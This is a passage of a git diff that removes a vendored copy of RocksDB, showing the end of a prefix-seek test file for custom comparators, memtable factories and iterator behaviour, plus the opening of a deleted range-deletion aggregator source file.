-class TestKeyComparator : public Comparator {
- public:
-
-  // Compare needs to be aware of the possibility of a and/or b is
-  // prefix only
-  virtual int Compare(const Slice& a, const Slice& b) const override {
-    const TestKey kkey_a = SliceToTestKey(a);
-    const TestKey kkey_b = SliceToTestKey(b);
-    const TestKey *key_a = &kkey_a;
-    const TestKey *key_b = &kkey_b;
-    if (key_a->prefix != key_b->prefix) {
-      if (key_a->prefix < key_b->prefix) return -1;
-      if (key_a->prefix > key_b->prefix) return 1;
-    } else {
-      EXPECT_TRUE(key_a->prefix == key_b->prefix);
-      // note, both a and b could be prefix only
-      if (a.size() != b.size()) {
-        // one of them is prefix
-        EXPECT_TRUE(
-            (a.size() == sizeof(uint64_t) && b.size() == sizeof(TestKey)) ||
-            (b.size() == sizeof(uint64_t) && a.size() == sizeof(TestKey)));
-        if (a.size() < b.size()) return -1;
-        if (a.size() > b.size()) return 1;
-      } else {
-        // both a and b are prefix
-        if (a.size() == sizeof(uint64_t)) {
-          return 0;
-        }
-
-        // both a and b are whole key
-        EXPECT_TRUE(a.size() == sizeof(TestKey) && b.size() == sizeof(TestKey));
-        if (key_a->sorted < key_b->sorted) return -1;
-        if (key_a->sorted > key_b->sorted) return 1;
-        if (key_a->sorted == key_b->sorted) return 0;
-      }
-    }
-    return 0;
-  }
-
-  bool operator()(const TestKey& a, const TestKey& b) const {
-    std::string sa, sb;
-    return Compare(TestKeyToSlice(sa, a), TestKeyToSlice(sb, b)) < 0;
-  }
-
-  virtual const char* Name() const override {
-    return "TestKeyComparator";
-  }
-
-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override {}
-
-  virtual void FindShortSuccessor(std::string* key) const override {}
-};
-
-namespace {
-void PutKey(DB* db, WriteOptions write_options, uint64_t prefix,
-            uint64_t suffix, const Slice& value) {
-  TestKey test_key(prefix, suffix);
-  std::string s;
-  Slice key = TestKeyToSlice(s, test_key);
-  ASSERT_OK(db->Put(write_options, key, value));
-}
-
-void PutKey(DB* db, WriteOptions write_options, const TestKey& test_key,
-            const Slice& value) {
-  std::string s;
-  Slice key = TestKeyToSlice(s, test_key);
-  ASSERT_OK(db->Put(write_options, key, value));
-}
-
-void MergeKey(DB* db, WriteOptions write_options, const TestKey& test_key,
-              const Slice& value) {
-  std::string s;
-  Slice key = TestKeyToSlice(s, test_key);
-  ASSERT_OK(db->Merge(write_options, key, value));
-}
-
-void DeleteKey(DB* db, WriteOptions write_options, const TestKey& test_key) {
-  std::string s;
-  Slice key = TestKeyToSlice(s, test_key);
-  ASSERT_OK(db->Delete(write_options, key));
-}
-
-void SeekIterator(Iterator* iter, uint64_t prefix, uint64_t suffix) {
-  TestKey test_key(prefix, suffix);
-  std::string s;
-  Slice key = TestKeyToSlice(s, test_key);
-  iter->Seek(key);
-}
-
-const std::string kNotFoundResult = "NOT_FOUND";
-
-std::string Get(DB* db, const ReadOptions& read_options, uint64_t prefix,
-                uint64_t suffix) {
-  TestKey test_key(prefix, suffix);
-  std::string s2;
-  Slice key = TestKeyToSlice(s2, test_key);
-
-  std::string result;
-  Status s = db->Get(read_options, key, &result);
-  if (s.IsNotFound()) {
-    result = kNotFoundResult;
-  } else if (!s.ok()) {
-    result = s.ToString();
-  }
-  return result;
-}
-
-class SamePrefixTransform : public SliceTransform {
- private:
-  const Slice prefix_;
-  std::string name_;
-
- public:
-  explicit SamePrefixTransform(const Slice& prefix)
-      : prefix_(prefix), name_("rocksdb.SamePrefix." + prefix.ToString()) {}
-
-  virtual const char* Name() const override { return name_.c_str(); }
-
-  virtual Slice Transform(const Slice& src) const override {
-    assert(InDomain(src));
-    return prefix_;
-  }
-
-  virtual bool InDomain(const Slice& src) const override {
-    if (src.size() >= prefix_.size()) {
-      return Slice(src.data(), prefix_.size()) == prefix_;
-    }
-    return false;
-  }
-
-  virtual bool InRange(const Slice& dst) const override {
-    return dst == prefix_;
-  }
-};
-
-}  // namespace
-
-class PrefixTest : public testing::Test {
- public:
-  std::shared_ptr<DB> OpenDb() {
-    DB* db;
-
-    options.create_if_missing = true;
-    options.write_buffer_size = FLAGS_write_buffer_size;
-    options.max_write_buffer_number = FLAGS_max_write_buffer_number;
-    options.min_write_buffer_number_to_merge =
-      FLAGS_min_write_buffer_number_to_merge;
-
-    options.memtable_prefix_bloom_size_ratio =
-        FLAGS_memtable_prefix_bloom_size_ratio;
-    options.memtable_huge_page_size = FLAGS_memtable_huge_page_size;
-
-    options.prefix_extractor.reset(NewFixedPrefixTransform(8));
-    BlockBasedTableOptions bbto;
-    bbto.filter_policy.reset(NewBloomFilterPolicy(10, false));
-    bbto.whole_key_filtering = false;
-    options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-    options.allow_concurrent_memtable_write = false;
-
-    Status s = DB::Open(options, kDbName,  &db);
-    EXPECT_OK(s);
-    return std::shared_ptr<DB>(db);
-  }
-
-  void FirstOption() {
-    option_config_ = kBegin;
-  }
-
-  bool NextOptions(int bucket_count) {
-    // skip some options
-    option_config_++;
-    if (option_config_ < kEnd) {
-      options.prefix_extractor.reset(NewFixedPrefixTransform(8));
-      switch(option_config_) {
-        case kHashSkipList:
-          options.memtable_factory.reset(
-              NewHashSkipListRepFactory(bucket_count, FLAGS_skiplist_height));
-          return true;
-        case kHashLinkList:
-          options.memtable_factory.reset(
-              NewHashLinkListRepFactory(bucket_count));
-          return true;
-        case kHashLinkListHugePageTlb:
-          options.memtable_factory.reset(
-              NewHashLinkListRepFactory(bucket_count, 2 * 1024 * 1024));
-          return true;
-        case kHashLinkListTriggerSkipList:
-          options.memtable_factory.reset(
-              NewHashLinkListRepFactory(bucket_count, 0, 3));
-          return true;
-        default:
-          return false;
-      }
-    }
-    return false;
-  }
-
-  PrefixTest() : option_config_(kBegin) {
-    options.comparator = new TestKeyComparator();
-  }
-  ~PrefixTest() {
-    delete options.comparator;
-  }
- protected:
-  enum OptionConfig {
-    kBegin,
-    kHashSkipList,
-    kHashLinkList,
-    kHashLinkListHugePageTlb,
-    kHashLinkListTriggerSkipList,
-    kEnd
-  };
-  int option_config_;
-  Options options;
-};
-
-TEST(SamePrefixTest, InDomainTest) {
-  DB* db;
-  Options options;
-  options.create_if_missing = true;
-  options.prefix_extractor.reset(new SamePrefixTransform("HHKB"));
-  BlockBasedTableOptions bbto;
-  bbto.filter_policy.reset(NewBloomFilterPolicy(10, false));
-  bbto.whole_key_filtering = false;
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-  WriteOptions write_options;
-  ReadOptions read_options;
-  {
-    ASSERT_OK(DestroyDB(kDbName, Options()));
-    ASSERT_OK(DB::Open(options, kDbName, &db));
-    ASSERT_OK(db->Put(write_options, "HHKB pro2", "Mar 24, 2006"));
-    ASSERT_OK(db->Put(write_options, "HHKB pro2 Type-S", "June 29, 2011"));
-    ASSERT_OK(db->Put(write_options, "Realforce 87u", "idk"));
-    db->Flush(FlushOptions());
-    std::string result;
-    auto db_iter = db->NewIterator(ReadOptions());
-
-    db_iter->Seek("Realforce 87u");
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_OK(db_iter->status());
-    ASSERT_EQ(db_iter->key(), "Realforce 87u");
-    ASSERT_EQ(db_iter->value(), "idk");
-
-    delete db_iter;
-    delete db;
-    ASSERT_OK(DestroyDB(kDbName, Options()));
-  }
-
-  {
-    ASSERT_OK(DB::Open(options, kDbName, &db));
-    ASSERT_OK(db->Put(write_options, "pikachu", "1"));
-    ASSERT_OK(db->Put(write_options, "Meowth", "1"));
-    ASSERT_OK(db->Put(write_options, "Mewtwo", "idk"));
-    db->Flush(FlushOptions());
-    std::string result;
-    auto db_iter = db->NewIterator(ReadOptions());
-
-    db_iter->Seek("Mewtwo");
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_OK(db_iter->status());
-    delete db_iter;
-    delete db;
-    ASSERT_OK(DestroyDB(kDbName, Options()));
-  }
-}
-
-TEST_F(PrefixTest, TestResult) {
-  for (int num_buckets = 1; num_buckets <= 2; num_buckets++) {
-    FirstOption();
-    while (NextOptions(num_buckets)) {
-      std::cout << "*** Mem table: " << options.memtable_factory->Name()
-                << " number of buckets: " << num_buckets
-                << std::endl;
-      DestroyDB(kDbName, Options());
-      auto db = OpenDb();
-      WriteOptions write_options;
-      ReadOptions read_options;
-
-      // 1. Insert one row.
-      Slice v16("v16");
-      PutKey(db.get(), write_options, 1, 6, v16);
-      std::unique_ptr<Iterator> iter(db->NewIterator(read_options));
-      SeekIterator(iter.get(), 1, 6);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v16 == iter->value());
-      SeekIterator(iter.get(), 1, 5);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v16 == iter->value());
-      SeekIterator(iter.get(), 1, 5);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v16 == iter->value());
-      iter->Next();
-      ASSERT_TRUE(!iter->Valid());
-
-      SeekIterator(iter.get(), 2, 0);
-      ASSERT_TRUE(!iter->Valid());
-
-      ASSERT_EQ(v16.ToString(), Get(db.get(), read_options, 1, 6));
-      ASSERT_EQ(kNotFoundResult, Get(db.get(), read_options, 1, 5));
-      ASSERT_EQ(kNotFoundResult, Get(db.get(), read_options, 1, 7));
-      ASSERT_EQ(kNotFoundResult, Get(db.get(), read_options, 0, 6));
-      ASSERT_EQ(kNotFoundResult, Get(db.get(), read_options, 2, 6));
-
-      // 2. Insert an entry for the same prefix as the last entry in the bucket.
-      Slice v17("v17");
-      PutKey(db.get(), write_options, 1, 7, v17);
-      iter.reset(db->NewIterator(read_options));
-      SeekIterator(iter.get(), 1, 7);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v17 == iter->value());
-
-      SeekIterator(iter.get(), 1, 6);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v16 == iter->value());
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v17 == iter->value());
-      iter->Next();
-      ASSERT_TRUE(!iter->Valid());
-
-      SeekIterator(iter.get(), 2, 0);
-      ASSERT_TRUE(!iter->Valid());
-
-      // 3. Insert an entry for the same prefix as the head of the bucket.
-      Slice v15("v15");
-      PutKey(db.get(), write_options, 1, 5, v15);
-      iter.reset(db->NewIterator(read_options));
-
-      SeekIterator(iter.get(), 1, 7);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v17 == iter->value());
-
-      SeekIterator(iter.get(), 1, 5);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v15 == iter->value());
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v16 == iter->value());
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v17 == iter->value());
-
-      SeekIterator(iter.get(), 1, 5);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v15 == iter->value());
-
-      ASSERT_EQ(v15.ToString(), Get(db.get(), read_options, 1, 5));
-      ASSERT_EQ(v16.ToString(), Get(db.get(), read_options, 1, 6));
-      ASSERT_EQ(v17.ToString(), Get(db.get(), read_options, 1, 7));
-
-      // 4. Insert an entry with a larger prefix
-      Slice v22("v22");
-      PutKey(db.get(), write_options, 2, 2, v22);
-      iter.reset(db->NewIterator(read_options));
-
-      SeekIterator(iter.get(), 2, 2);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v22 == iter->value());
-      SeekIterator(iter.get(), 2, 0);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v22 == iter->value());
-
-      SeekIterator(iter.get(), 1, 5);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v15 == iter->value());
-
-      SeekIterator(iter.get(), 1, 7);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v17 == iter->value());
-
-      // 5. Insert an entry with a smaller prefix
-      Slice v02("v02");
-      PutKey(db.get(), write_options, 0, 2, v02);
-      iter.reset(db->NewIterator(read_options));
-
-      SeekIterator(iter.get(), 0, 2);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v02 == iter->value());
-      SeekIterator(iter.get(), 0, 0);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v02 == iter->value());
-
-      SeekIterator(iter.get(), 2, 0);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v22 == iter->value());
-
-      SeekIterator(iter.get(), 1, 5);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v15 == iter->value());
-
-      SeekIterator(iter.get(), 1, 7);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v17 == iter->value());
-
-      // 6. Insert to the beginning and the end of the first prefix
-      Slice v13("v13");
-      Slice v18("v18");
-      PutKey(db.get(), write_options, 1, 3, v13);
-      PutKey(db.get(), write_options, 1, 8, v18);
-      iter.reset(db->NewIterator(read_options));
-      SeekIterator(iter.get(), 1, 7);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v17 == iter->value());
-
-      SeekIterator(iter.get(), 1, 3);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v13 == iter->value());
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v15 == iter->value());
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v16 == iter->value());
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v17 == iter->value());
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v18 == iter->value());
-
-      SeekIterator(iter.get(), 0, 0);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v02 == iter->value());
-
-      SeekIterator(iter.get(), 2, 0);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v22 == iter->value());
-
-      ASSERT_EQ(v22.ToString(), Get(db.get(), read_options, 2, 2));
-      ASSERT_EQ(v02.ToString(), Get(db.get(), read_options, 0, 2));
-      ASSERT_EQ(v13.ToString(), Get(db.get(), read_options, 1, 3));
-      ASSERT_EQ(v15.ToString(), Get(db.get(), read_options, 1, 5));
-      ASSERT_EQ(v16.ToString(), Get(db.get(), read_options, 1, 6));
-      ASSERT_EQ(v17.ToString(), Get(db.get(), read_options, 1, 7));
-      ASSERT_EQ(v18.ToString(), Get(db.get(), read_options, 1, 8));
-    }
-  }
-}
-
-// Show results in prefix
-TEST_F(PrefixTest, PrefixValid) {
-  for (int num_buckets = 1; num_buckets <= 2; num_buckets++) {
-    FirstOption();
-    while (NextOptions(num_buckets)) {
-      std::cout << "*** Mem table: " << options.memtable_factory->Name()
-                << " number of buckets: " << num_buckets << std::endl;
-      DestroyDB(kDbName, Options());
-      auto db = OpenDb();
-      WriteOptions write_options;
-      ReadOptions read_options;
-
-      // Insert keys with common prefix and one key with different
-      Slice v16("v16");
-      Slice v17("v17");
-      Slice v18("v18");
-      Slice v19("v19");
-      PutKey(db.get(), write_options, 12345, 6, v16);
-      PutKey(db.get(), write_options, 12345, 7, v17);
-      PutKey(db.get(), write_options, 12345, 8, v18);
-      PutKey(db.get(), write_options, 12345, 9, v19);
-      PutKey(db.get(), write_options, 12346, 8, v16);
-      db->Flush(FlushOptions());
-      TestKey test_key(12346, 8);
-      std::string s;
-      db->Delete(write_options, TestKeyToSlice(s, test_key));
-      db->Flush(FlushOptions());
-      read_options.prefix_same_as_start = true;
-      std::unique_ptr<Iterator> iter(db->NewIterator(read_options));
-      SeekIterator(iter.get(), 12345, 6);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v16 == iter->value());
-
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v17 == iter->value());
-
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v18 == iter->value());
-
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v19 == iter->value());
-      iter->Next();
-      ASSERT_FALSE(iter->Valid());
-      ASSERT_EQ(kNotFoundResult, Get(db.get(), read_options, 12346, 8));
-
-      // Verify seeking past the prefix won't return a result.
-      SeekIterator(iter.get(), 12345, 10);
-      ASSERT_TRUE(!iter->Valid());
-    }
-  }
-}
-
-TEST_F(PrefixTest, DynamicPrefixIterator) {
-  while (NextOptions(FLAGS_bucket_count)) {
-    std::cout << "*** Mem table: " << options.memtable_factory->Name()
-        << std::endl;
-    DestroyDB(kDbName, Options());
-    auto db = OpenDb();
-    WriteOptions write_options;
-    ReadOptions read_options;
-
-    std::vector<uint64_t> prefixes;
-    for (uint64_t i = 0; i < FLAGS_total_prefixes; ++i) {
-      prefixes.push_back(i);
-    }
-
-    if (FLAGS_random_prefix) {
-      std::random_shuffle(prefixes.begin(), prefixes.end());
-    }
-
-    HistogramImpl hist_put_time;
-    HistogramImpl hist_put_comparison;
-
-    // insert x random prefix, each with y continuous element.
-    for (auto prefix : prefixes) {
-       for (uint64_t sorted = 0; sorted < FLAGS_items_per_prefix; sorted++) {
-        TestKey test_key(prefix, sorted);
-
-        std::string s;
-        Slice key = TestKeyToSlice(s, test_key);
-        std::string value(FLAGS_value_size, 0);
-
-        get_perf_context()->Reset();
-        StopWatchNano timer(Env::Default(), true);
-        ASSERT_OK(db->Put(write_options, key, value));
-        hist_put_time.Add(timer.ElapsedNanos());
-        hist_put_comparison.Add(get_perf_context()->user_key_comparison_count);
-      }
-    }
-
-    std::cout << "Put key comparison: \n" << hist_put_comparison.ToString()
-              << "Put time: \n" << hist_put_time.ToString();
-
-    // test seek existing keys
-    HistogramImpl hist_seek_time;
-    HistogramImpl hist_seek_comparison;
-
-    std::unique_ptr<Iterator> iter(db->NewIterator(read_options));
-
-    for (auto prefix : prefixes) {
-      TestKey test_key(prefix, FLAGS_items_per_prefix / 2);
-      std::string s;
-      Slice key = TestKeyToSlice(s, test_key);
-      std::string value = "v" + ToString(0);
-
-      get_perf_context()->Reset();
-      StopWatchNano timer(Env::Default(), true);
-      auto key_prefix = options.prefix_extractor->Transform(key);
-      uint64_t total_keys = 0;
-      for (iter->Seek(key);
-           iter->Valid() && iter->key().starts_with(key_prefix);
-           iter->Next()) {
-        if (FLAGS_trigger_deadlock) {
-          std::cout << "Behold the deadlock!\n";
-          db->Delete(write_options, iter->key());
-        }
-        total_keys++;
-      }
-      hist_seek_time.Add(timer.ElapsedNanos());
-      hist_seek_comparison.Add(get_perf_context()->user_key_comparison_count);
-      ASSERT_EQ(total_keys, FLAGS_items_per_prefix - FLAGS_items_per_prefix/2);
-    }
-
-    std::cout << "Seek key comparison: \n"
-              << hist_seek_comparison.ToString()
-              << "Seek time: \n"
-              << hist_seek_time.ToString();
-
-    // test non-existing keys
-    HistogramImpl hist_no_seek_time;
-    HistogramImpl hist_no_seek_comparison;
-
-    for (auto prefix = FLAGS_total_prefixes;
-         prefix < FLAGS_total_prefixes + 10000;
-         prefix++) {
-      TestKey test_key(prefix, 0);
-      std::string s;
-      Slice key = TestKeyToSlice(s, test_key);
-
-      get_perf_context()->Reset();
-      StopWatchNano timer(Env::Default(), true);
-      iter->Seek(key);
-      hist_no_seek_time.Add(timer.ElapsedNanos());
-      hist_no_seek_comparison.Add(get_perf_context()->user_key_comparison_count);
-      ASSERT_TRUE(!iter->Valid());
-    }
-
-    std::cout << "non-existing Seek key comparison: \n"
-              << hist_no_seek_comparison.ToString()
-              << "non-existing Seek time: \n"
-              << hist_no_seek_time.ToString();
-  }
-}
-
-TEST_F(PrefixTest, PrefixSeekModePrev) {
-  // Only for SkipListFactory
-  options.memtable_factory.reset(new SkipListFactory);
-  options.merge_operator = MergeOperators::CreatePutOperator();
-  options.write_buffer_size = 1024 * 1024;
-  Random rnd(1);
-  for (size_t m = 1; m < 100; m++) {
-    std::cout << "[" + std::to_string(m) + "]" + "*** Mem table: "
-              << options.memtable_factory->Name() << std::endl;
-    DestroyDB(kDbName, Options());
-    auto db = OpenDb();
-    WriteOptions write_options;
-    ReadOptions read_options;
-    std::map<TestKey, std::string, TestKeyComparator> entry_maps[3], whole_map;
-    for (uint64_t i = 0; i < 10; i++) {
-      int div = i % 3 + 1;
-      for (uint64_t j = 0; j < 10; j++) {
-        whole_map[TestKey(i, j)] = entry_maps[rnd.Uniform(div)][TestKey(i, j)] =
-            'v' + std::to_string(i) + std::to_string(j);
-      }
-    }
-
-    std::map<TestKey, std::string, TestKeyComparator> type_map;
-    for (size_t i = 0; i < 3; i++) {
-      for (auto& kv : entry_maps[i]) {
-        if (rnd.OneIn(3)) {
-          PutKey(db.get(), write_options, kv.first, kv.second);
-          type_map[kv.first] = "value";
-        } else {
-          MergeKey(db.get(), write_options, kv.first, kv.second);
-          type_map[kv.first] = "merge";
-        }
-      }
-      if (i < 2) {
-        db->Flush(FlushOptions());
-      }
-    }
-
-    for (size_t i = 0; i < 2; i++) {
-      for (auto& kv : entry_maps[i]) {
-        if (rnd.OneIn(10)) {
-          whole_map.erase(kv.first);
-          DeleteKey(db.get(), write_options, kv.first);
-          entry_maps[2][kv.first] = "delete";
-        }
-      }
-    }
-
-    if (FLAGS_enable_print) {
-      for (size_t i = 0; i < 3; i++) {
-        for (auto& kv : entry_maps[i]) {
-          std::cout << "[" << i << "]" << kv.first.prefix << kv.first.sorted
-                    << " " << kv.second + " " + type_map[kv.first] << std::endl;
-        }
-      }
-    }
-
-    std::unique_ptr<Iterator> iter(db->NewIterator(read_options));
-    for (uint64_t prefix = 0; prefix < 10; prefix++) {
-      uint64_t start_suffix = rnd.Uniform(9);
-      SeekIterator(iter.get(), prefix, start_suffix);
-      auto it = whole_map.find(TestKey(prefix, start_suffix));
-      if (it == whole_map.end()) {
-        continue;
-      }
-      ASSERT_NE(it, whole_map.end());
-      ASSERT_TRUE(iter->Valid());
-      if (FLAGS_enable_print) {
-        std::cout << "round " << prefix
-                  << " iter: " << SliceToTestKey(iter->key()).prefix
-                  << SliceToTestKey(iter->key()).sorted
-                  << " | map: " << it->first.prefix << it->first.sorted << " | "
-                  << iter->value().ToString() << " " << it->second << std::endl;
-      }
-      ASSERT_EQ(iter->value(), it->second);
-      uint64_t stored_prefix = prefix;
-      for (size_t k = 0; k < 9; k++) {
-        if (rnd.OneIn(2) || it == whole_map.begin()) {
-          iter->Next();
-          it++;
-          if (FLAGS_enable_print) {
-            std::cout << "Next >> ";
-          }
-        } else {
-          iter->Prev();
-          it--;
-          if (FLAGS_enable_print) {
-            std::cout << "Prev >> ";
-          }
-        }
-        if (!iter->Valid() ||
-            SliceToTestKey(iter->key()).prefix != stored_prefix) {
-          break;
-        }
-        stored_prefix = SliceToTestKey(iter->key()).prefix;
-        ASSERT_TRUE(iter->Valid());
-        ASSERT_NE(it, whole_map.end());
-        ASSERT_EQ(iter->value(), it->second);
-        if (FLAGS_enable_print) {
-          std::cout << "iter: " << SliceToTestKey(iter->key()).prefix
-                    << SliceToTestKey(iter->key()).sorted
-                    << " | map: " << it->first.prefix << it->first.sorted
-                    << " | " << iter->value().ToString() << " " << it->second
-                    << std::endl;
-        }
-      }
-    }
-  }
-}
-
-TEST_F(PrefixTest, PrefixSeekModePrev2) {
-  // Only for SkipListFactory
-  // test the case
-  //        iter1                iter2
-  // | prefix | suffix |  | prefix | suffix |
-  // |   1    |   1    |  |   1    |   2    |
-  // |   1    |   3    |  |   1    |   4    |
-  // |   2    |   1    |  |   3    |   3    |
-  // |   2    |   2    |  |   3    |   4    |
-  // after seek(15), iter1 will be at 21 and iter2 will be 33.
-  // Then if call Prev() in prefix mode where SeekForPrev(21) gets called,
-  // iter2 should turn to invalid state because of bloom filter.
-  options.memtable_factory.reset(new SkipListFactory);
-  options.write_buffer_size = 1024 * 1024;
-  std::string v13("v13");
-  DestroyDB(kDbName, Options());
-  auto db = OpenDb();
-  WriteOptions write_options;
-  ReadOptions read_options;
-  PutKey(db.get(), write_options, TestKey(1, 2), "v12");
-  PutKey(db.get(), write_options, TestKey(1, 4), "v14");
-  PutKey(db.get(), write_options, TestKey(3, 3), "v33");
-  PutKey(db.get(), write_options, TestKey(3, 4), "v34");
-  db->Flush(FlushOptions());
-  reinterpret_cast<DBImpl*>(db.get())->TEST_WaitForFlushMemTable();
-  PutKey(db.get(), write_options, TestKey(1, 1), "v11");
-  PutKey(db.get(), write_options, TestKey(1, 3), "v13");
-  PutKey(db.get(), write_options, TestKey(2, 1), "v21");
-  PutKey(db.get(), write_options, TestKey(2, 2), "v22");
-  db->Flush(FlushOptions());
-  reinterpret_cast<DBImpl*>(db.get())->TEST_WaitForFlushMemTable();
-  std::unique_ptr<Iterator> iter(db->NewIterator(read_options));
-  SeekIterator(iter.get(), 1, 5);
-  iter->Prev();
-  ASSERT_EQ(iter->value(), v13);
-}
-
-TEST_F(PrefixTest, PrefixSeekModePrev3) {
-  // Only for SkipListFactory
-  // test SeekToLast() with iterate_upper_bound_ in prefix_seek_mode
-  options.memtable_factory.reset(new SkipListFactory);
-  options.write_buffer_size = 1024 * 1024;
-  std::string v14("v14");
-  TestKey upper_bound_key = TestKey(1, 5);
-  std::string s;
-  Slice upper_bound = TestKeyToSlice(s, upper_bound_key);
-
-  {
-    DestroyDB(kDbName, Options());
-    auto db = OpenDb();
-    WriteOptions write_options;
-    ReadOptions read_options;
-    read_options.iterate_upper_bound = &upper_bound;
-    PutKey(db.get(), write_options, TestKey(1, 2), "v12");
-    PutKey(db.get(), write_options, TestKey(1, 4), "v14");
-    db->Flush(FlushOptions());
-    reinterpret_cast<DBImpl*>(db.get())->TEST_WaitForFlushMemTable();
-    PutKey(db.get(), write_options, TestKey(1, 1), "v11");
-    PutKey(db.get(), write_options, TestKey(1, 3), "v13");
-    PutKey(db.get(), write_options, TestKey(2, 1), "v21");
-    PutKey(db.get(), write_options, TestKey(2, 2), "v22");
-    db->Flush(FlushOptions());
-    reinterpret_cast<DBImpl*>(db.get())->TEST_WaitForFlushMemTable();
-    std::unique_ptr<Iterator> iter(db->NewIterator(read_options));
-    iter->SeekToLast();
-    ASSERT_EQ(iter->value(), v14);
-  }
-  {
-    DestroyDB(kDbName, Options());
-    auto db = OpenDb();
-    WriteOptions write_options;
-    ReadOptions read_options;
-    read_options.iterate_upper_bound = &upper_bound;
-    PutKey(db.get(), write_options, TestKey(1, 2), "v12");
-    PutKey(db.get(), write_options, TestKey(1, 4), "v14");
-    PutKey(db.get(), write_options, TestKey(3, 3), "v33");
-    PutKey(db.get(), write_options, TestKey(3, 4), "v34");
-    db->Flush(FlushOptions());
-    reinterpret_cast<DBImpl*>(db.get())->TEST_WaitForFlushMemTable();
-    PutKey(db.get(), write_options, TestKey(1, 1), "v11");
-    PutKey(db.get(), write_options, TestKey(1, 3), "v13");
-    db->Flush(FlushOptions());
-    reinterpret_cast<DBImpl*>(db.get())->TEST_WaitForFlushMemTable();
-    std::unique_ptr<Iterator> iter(db->NewIterator(read_options));
-    iter->SeekToLast();
-    ASSERT_EQ(iter->value(), v14);
-  }
-}
-
-}  // end namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  ParseCommandLineFlags(&argc, &argv, true);
-  std::cout << kDbName << "\n";
-
-  return RUN_ALL_TESTS();
-}
-
-#endif  // GFLAGS
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr,
-          "SKIPPED as HashSkipList and HashLinkList are not supported in "
-          "ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/range_del_aggregator.cc b/thirdparty/rocksdb/db/range_del_aggregator.cc
deleted file mode 100644
index c83f5a8..0000000
--- a/thirdparty/rocksdb/db/range_del_aggregator.cc
+++ /dev/null
@@ -1,520 +0,0 @@
-//  Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/range_del_aggregator.h"
-
-#include <algorithm>
-
-namespace rocksdb {
-
-RangeDelAggregator::RangeDelAggregator(
-    const InternalKeyComparator& icmp,
-    const std::vector<SequenceNumber>& snapshots,
-    bool collapse_deletions /* = true */)
-    : upper_bound_(kMaxSequenceNumber),
-      icmp_(icmp),
-      collapse_deletions_(collapse_deletions) {
-  InitRep(snapshots);
-}
-
-RangeDelAggregator::RangeDelAggregator(const InternalKeyComparator& icmp,
-                                       SequenceNumber snapshot,
-                                       bool collapse_deletions /* = false */)
-    : upper_bound_(snapshot),
-      icmp_(icmp),
-      collapse_deletions_(collapse_deletions) {}
-
-void RangeDelAggregator::InitRep(const std::vector<SequenceNumber>& snapshots) {
-  assert(rep_ == nullptr);
-  rep_.reset(new Rep());
-  for (auto snapshot : snapshots) {
-    rep_->stripe_map_.emplace(
-        snapshot,
-        PositionalTombstoneMap(TombstoneMap(
-            stl_wrappers::LessOfComparator(icmp_.user_comparator()))));
-  }
-  // Data newer than any snapshot falls in this catch-all stripe
-  rep_->stripe_map_.emplace(
-      kMaxSequenceNumber,
-      PositionalTombstoneMap(TombstoneMap(
-          stl_wrappers::LessOfComparator(icmp_.user_comparator()))));
-  rep_->pinned_iters_mgr_.StartPinning();
-}
-
-bool RangeDelAggregator::ShouldDelete(
-    const Slice& internal_key, RangeDelAggregator::RangePositioningMode mode) {
-  if (rep_ == nullptr) {
-    return false;
-  }
-  ParsedInternalKey parsed;
-  if (!ParseInternalKey(internal_key, &parsed)) {
-    assert(false);
-  }
-  return ShouldDelete(parsed, mode);
-}
-
-bool RangeDelAggregator::ShouldDelete(
-    const ParsedInternalKey& parsed,
-    RangeDelAggregator::RangePositioningMode mode) {
-  assert(IsValueType(parsed.type));
